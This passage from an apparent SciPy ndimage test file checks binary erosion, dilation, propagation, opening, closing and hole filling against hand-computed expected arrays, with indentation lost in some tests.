                                     border_value=1, origin=(-1, -1))
        assert_array_almost_equal(out, expected)
def test_binary_erosion37(self):
a = numpy.array([[1, 0, 1],
[0, 1, 0],
[1, 0, 1]], dtype=bool)
b = numpy.zeros_like(a)
out = ndimage.binary_erosion(a, structure=a, output=b, iterations=0,
border_value=True, brute_force=True)
assert_(out is b)
assert_array_equal(
ndimage.binary_erosion(a, structure=a, iterations=0,
border_value=True),
b)
def test_binary_erosion38(self):
data = numpy.array([[1, 0, 1],
[0, 1, 0],
[1, 0, 1]], dtype=bool)
iterations = 2.0
with assert_raises(TypeError):
_ = ndimage.binary_erosion(data, iterations=iterations)
    def test_binary_erosion39(self):
        """iterations given as a numpy.int32 scalar is accepted and behaves
        like the equivalent Python int (same fixture as erosion29/30)."""
        iterations = numpy.int32(3)
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=iterations, output=out)
        assert_array_almost_equal(out, expected)
    def test_binary_erosion40(self):
        """iterations given as a numpy.int64 scalar is accepted and behaves
        like the equivalent Python int (same fixture as erosion39)."""
        iterations = numpy.int64(3)
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 1, 0, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [1, 1, 1, 1, 1, 1, 1],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 1, 1, 1, 0, 0],
                            [0, 0, 0, 1, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_erosion(data, struct, border_value=1,
                               iterations=iterations, output=out)
        assert_array_almost_equal(out, expected)
def test_binary_dilation01(self):
for type_ in self.types:
data = numpy.ones([], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, 1)
def test_binary_dilation02(self):
for type_ in self.types:
data = numpy.zeros([], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, 0)
def test_binary_dilation03(self):
for type_ in self.types:
data = numpy.ones([1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1])
def test_binary_dilation04(self):
for type_ in self.types:
data = numpy.zeros([1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [0])
def test_binary_dilation05(self):
for type_ in self.types:
data = numpy.ones([3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_dilation06(self):
for type_ in self.types:
data = numpy.zeros([3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [0, 0, 0])
def test_binary_dilation07(self):
for type_ in self.types:
data = numpy.zeros([3], type_)
data[1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1])
def test_binary_dilation08(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
data[3] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1, 1, 1])
def test_binary_dilation09(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [1, 1, 1, 0, 0])
def test_binary_dilation10(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data, origin=-1)
assert_array_almost_equal(out, [0, 1, 1, 1, 0])
def test_binary_dilation11(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
out = ndimage.binary_dilation(data, origin=1)
assert_array_almost_equal(out, [1, 1, 0, 0, 0])
def test_binary_dilation12(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, [1, 0, 1, 0, 0])
def test_binary_dilation13(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct, border_value=1)
assert_array_almost_equal(out, [1, 0, 1, 0, 1])
def test_binary_dilation14(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct, origin=-1)
assert_array_almost_equal(out, [0, 1, 0, 1, 0])
def test_binary_dilation15(self):
for type_ in self.types:
data = numpy.zeros([5], type_)
data[1] = 1
struct = [1, 0, 1]
out = ndimage.binary_dilation(data, struct,
origin=-1, border_value=1)
assert_array_almost_equal(out, [1, 1, 0, 1, 0])
def test_binary_dilation16(self):
for type_ in self.types:
data = numpy.ones([1, 1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1]])
def test_binary_dilation17(self):
for type_ in self.types:
data = numpy.zeros([1, 1], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[0]])
def test_binary_dilation18(self):
for type_ in self.types:
data = numpy.ones([1, 3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1, 1, 1]])
def test_binary_dilation19(self):
for type_ in self.types:
data = numpy.ones([3, 3], type_)
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
def test_binary_dilation20(self):
for type_ in self.types:
data = numpy.zeros([3, 3], type_)
data[1, 1] = 1
out = ndimage.binary_dilation(data)
assert_array_almost_equal(out, [[0, 1, 0],
[1, 1, 1],
[0, 1, 0]])
def test_binary_dilation21(self):
struct = ndimage.generate_binary_structure(2, 2)
for type_ in self.types:
data = numpy.zeros([3, 3], type_)
data[1, 1] = 1
out = ndimage.binary_dilation(data, struct)
assert_array_almost_equal(out, [[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
    def test_binary_dilation22(self):
        """Default (cross) dilation of an 8x8 pattern, checked against a
        hand-computed fixture for every supported dtype."""
        expected = [[0, 1, 0, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 0, 0, 0, 0],
                    [0, 1, 0, 0, 0, 1, 0, 0],
                    [0, 0, 0, 1, 1, 1, 1, 0],
                    [0, 0, 1, 1, 1, 1, 0, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data)
            assert_array_almost_equal(out, expected)
    def test_binary_dilation23(self):
        """Cross dilation with border_value=1: the ones border bleeds one
        pixel into the image in addition to the interior dilation."""
        expected = [[1, 1, 1, 1, 1, 1, 1, 1],
                    [1, 1, 1, 0, 0, 0, 0, 1],
                    [1, 1, 0, 0, 0, 1, 0, 1],
                    [1, 0, 0, 1, 1, 1, 1, 1],
                    [1, 0, 1, 1, 1, 1, 0, 1],
                    [1, 1, 1, 1, 1, 1, 1, 1],
                    [1, 0, 1, 0, 0, 1, 0, 1],
                    [1, 1, 1, 1, 1, 1, 1, 1]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_dilation24(self):
        """Cross dilation with origin=(1, 1): the dilation22 fixture shifted
        up and to the left by one pixel."""
        expected = [[1, 1, 0, 0, 0, 0, 0, 0],
                    [1, 0, 0, 0, 1, 0, 0, 0],
                    [0, 0, 1, 1, 1, 1, 0, 0],
                    [0, 1, 1, 1, 1, 0, 0, 0],
                    [1, 1, 1, 1, 1, 1, 0, 0],
                    [0, 1, 0, 0, 1, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, origin=(1, 1))
            assert_array_almost_equal(out, expected)
    def test_binary_dilation25(self):
        """Cross dilation with origin=(1, 1) and border_value=1 combined:
        shifted interior dilation plus the bleeding ones border."""
        expected = [[1, 1, 0, 0, 0, 0, 1, 1],
                    [1, 0, 0, 0, 1, 0, 1, 1],
                    [0, 0, 1, 1, 1, 1, 1, 1],
                    [0, 1, 1, 1, 1, 0, 1, 1],
                    [1, 1, 1, 1, 1, 1, 1, 1],
                    [0, 1, 0, 0, 1, 0, 1, 1],
                    [1, 1, 1, 1, 1, 1, 1, 1],
                    [1, 1, 1, 1, 1, 1, 1, 1]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, origin=(1, 1), border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_dilation26(self):
        """Dilation with the full 3x3 (connectivity-2) structure, checked
        against a hand-computed fixture for every supported dtype."""
        struct = ndimage.generate_binary_structure(2, 2)
        expected = [[1, 1, 1, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 1, 1, 1, 0],
                    [0, 0, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, struct)
            assert_array_almost_equal(out, expected)
    def test_binary_dilation27(self):
        """Dilation with an asymmetric 2x2 structure, checked against a
        hand-computed fixture for every supported dtype."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 1, 0, 0, 0, 0, 0, 0],
                    [1, 1, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 1, 0, 0],
                    [0, 0, 0, 1, 1, 1, 0, 0],
                    [0, 0, 1, 1, 1, 1, 0, 0],
                    [0, 1, 1, 0, 1, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, struct)
            assert_array_almost_equal(out, expected)
def test_binary_dilation28(self):
expected = [[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 1]]
for type_ in self.types:
data = numpy.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], type_)
out = ndimage.binary_dilation(data, border_value=1)
assert_array_almost_equal(out, expected)
    def test_binary_dilation29(self):
        """Two iterations with the asymmetric 2x2 structure grow a single
        seed into a staircase; result returned as a new array."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0],
                    [0, 0, 1, 1, 0],
                    [0, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_dilation(data, struct, iterations=2)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation30(self):
        """Same scenario as test_binary_dilation29 but writing into a
        caller-provided output array."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 0, 0, 0, 0],
                    [0, 0, 0, 1, 0],
                    [0, 0, 1, 1, 0],
                    [0, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_dilation(data, struct, iterations=2, output=out)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation31(self):
        """Three iterations with the 2x2 structure grow the seed one more
        staircase step than test_binary_dilation29."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 0, 0, 1, 0],
                    [0, 0, 1, 1, 0],
                    [0, 1, 1, 1, 0],
                    [1, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_dilation(data, struct, iterations=3)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation32(self):
        """Same scenario as test_binary_dilation31 but writing into a
        caller-provided output array."""
        struct = [[0, 1],
                  [1, 1]]
        expected = [[0, 0, 0, 1, 0],
                    [0, 0, 1, 1, 0],
                    [0, 1, 1, 1, 0],
                    [1, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0]]
        data = numpy.array([[0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0],
                            [0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 0]], bool)
        out = numpy.zeros(data.shape, bool)
        ndimage.binary_dilation(data, struct, iterations=3, output=out)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation33(self):
        """Dilation to convergence (iterations=-1) constrained by a mask
        with border_value=0: growth fills only mask-connected regions."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 1, 1, 0, 1, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 1, 1, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0, 0],
                            [0, 1, 1, 0, 1, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_dilation(data, struct, iterations=-1,
                                      mask=mask, border_value=0)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation34(self):
        """Dilation to convergence from an empty image with border_value=1:
        growth seeps in from the border but only through the mask."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 1, 0, 0, 0, 0, 0, 0],
                    [0, 1, 1, 0, 0, 0, 0, 0],
                    [0, 0, 1, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 0, 0, 0, 0, 0],
                            [0, 0, 1, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 1, 0, 0],
                            [0, 0, 0, 1, 1, 0, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.zeros(mask.shape, bool)
        out = ndimage.binary_dilation(data, struct, iterations=-1,
                                      mask=mask, border_value=1)
        assert_array_almost_equal(out, expected)
    def test_binary_dilation35(self):
        """Masked dilation with origin=(1, 1) and border_value=1.

        tmp is the expected unmasked result (the dilation25 fixture); the
        final fixture merges it inside the mask with the raw data outside.
        """
        tmp = [[1, 1, 0, 0, 0, 0, 1, 1],
               [1, 0, 0, 0, 1, 0, 1, 1],
               [0, 0, 1, 1, 1, 1, 1, 1],
               [0, 1, 1, 1, 1, 0, 1, 1],
               [1, 1, 1, 1, 1, 1, 1, 1],
               [0, 1, 0, 0, 1, 0, 1, 1],
               [1, 1, 1, 1, 1, 1, 1, 1],
               [1, 1, 1, 1, 1, 1, 1, 1]]
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 1, 0, 0],
                            [0, 0, 0, 1, 1, 0, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]])
        mask = [[0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 1, 1, 1, 1, 0, 0],
                [0, 0, 1, 1, 1, 1, 0, 0],
                [0, 0, 1, 1, 1, 1, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0],
                [0, 0, 0, 0, 0, 0, 0, 0]]
        expected = numpy.logical_and(tmp, mask)
        tmp = numpy.logical_and(data, numpy.logical_not(mask))
        expected = numpy.logical_or(expected, tmp)
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 0, 0, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_dilation(data, mask=mask,
                                          origin=(1, 1), border_value=1)
            assert_array_almost_equal(out, expected)
    def test_binary_propagation01(self):
        """binary_propagation matches dilation-to-convergence inside a mask
        with border_value=0 (same fixture as test_binary_dilation33)."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 1, 1, 0, 1, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 1, 0],
                            [0, 0, 0, 0, 1, 1, 0, 0],
                            [0, 0, 1, 1, 1, 0, 0, 0],
                            [0, 1, 1, 0, 1, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        out = ndimage.binary_propagation(data, struct,
                                         mask=mask, border_value=0)
        assert_array_almost_equal(out, expected)
    def test_binary_propagation02(self):
        """Propagation from an empty image with border_value=1 matches
        dilation-to-convergence (same fixture as test_binary_dilation34)."""
        struct = [[0, 1, 0],
                  [1, 1, 1],
                  [0, 1, 0]]
        expected = [[0, 1, 0, 0, 0, 0, 0, 0],
                    [0, 1, 1, 0, 0, 0, 0, 0],
                    [0, 0, 1, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        mask = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 0, 0, 0, 0, 0],
                            [0, 0, 1, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 1, 0, 0],
                            [0, 0, 0, 1, 1, 0, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.zeros(mask.shape, bool)
        out = ndimage.binary_propagation(data, struct,
                                         mask=mask, border_value=1)
        assert_array_almost_equal(out, expected)
    def test_binary_opening01(self):
        """Opening with the default structure removes protrusions that the
        cross element cannot contain, per hand-computed fixture."""
        expected = [[0, 1, 0, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 0, 0, 0, 0],
                    [0, 1, 0, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 1, 1, 1, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                                [1, 1, 1, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 1, 0],
                                [0, 0, 1, 1, 0, 1, 0, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_opening(data)
            assert_array_almost_equal(out, expected)
    def test_binary_opening02(self):
        """Opening with the full 3x3 structure keeps only regions that can
        hold a complete 3x3 square, per hand-computed fixture."""
        struct = ndimage.generate_binary_structure(2, 2)
        expected = [[1, 1, 1, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 0, 0, 0, 0],
                    [1, 1, 1, 0, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 1, 1, 1, 0, 0, 0, 0],
                    [0, 1, 1, 1, 0, 0, 0, 0],
                    [0, 1, 1, 1, 0, 0, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[1, 1, 1, 0, 0, 0, 0, 0],
                                [1, 1, 1, 0, 0, 0, 0, 0],
                                [1, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 1, 0, 1, 1, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_opening(data, struct)
            assert_array_almost_equal(out, expected)
    def test_binary_closing01(self):
        """Closing with the default structure fills gaps that the cross
        element cannot enter, per hand-computed fixture."""
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 1, 1, 0, 0, 0, 0, 0],
                    [0, 1, 1, 1, 0, 1, 0, 0],
                    [0, 0, 1, 1, 1, 1, 1, 0],
                    [0, 0, 1, 1, 1, 1, 0, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 0, 1, 0, 0, 1, 0, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[0, 1, 0, 0, 0, 0, 0, 0],
                                [1, 1, 1, 0, 0, 0, 0, 0],
                                [0, 1, 0, 0, 0, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 1, 0],
                                [0, 0, 1, 1, 0, 1, 0, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 1, 0, 0, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_closing(data)
            assert_array_almost_equal(out, expected)
    def test_binary_closing02(self):
        """Closing with the full 3x3 structure fills interior holes and
        smooths the outline, per hand-computed fixture."""
        struct = ndimage.generate_binary_structure(2, 2)
        expected = [[0, 0, 0, 0, 0, 0, 0, 0],
                    [0, 1, 1, 0, 0, 0, 0, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 1, 1, 1, 1, 1, 1, 0],
                    [0, 0, 0, 0, 0, 0, 0, 0]]
        for type_ in self.types:
            data = numpy.array([[1, 1, 1, 0, 0, 0, 0, 0],
                                [1, 1, 1, 0, 0, 0, 0, 0],
                                [1, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 1, 0, 1, 1, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 1, 1, 1, 1, 1, 1, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out = ndimage.binary_closing(data, struct)
            assert_array_almost_equal(out, expected)
    def test_binary_fill_holes01(self):
        """Filling a closed rectangular ring produces a solid rectangle."""
        expected = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0]], bool)
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 1, 1, 1, 1, 0, 0],
                            [0, 0, 1, 0, 0, 1, 0, 0],
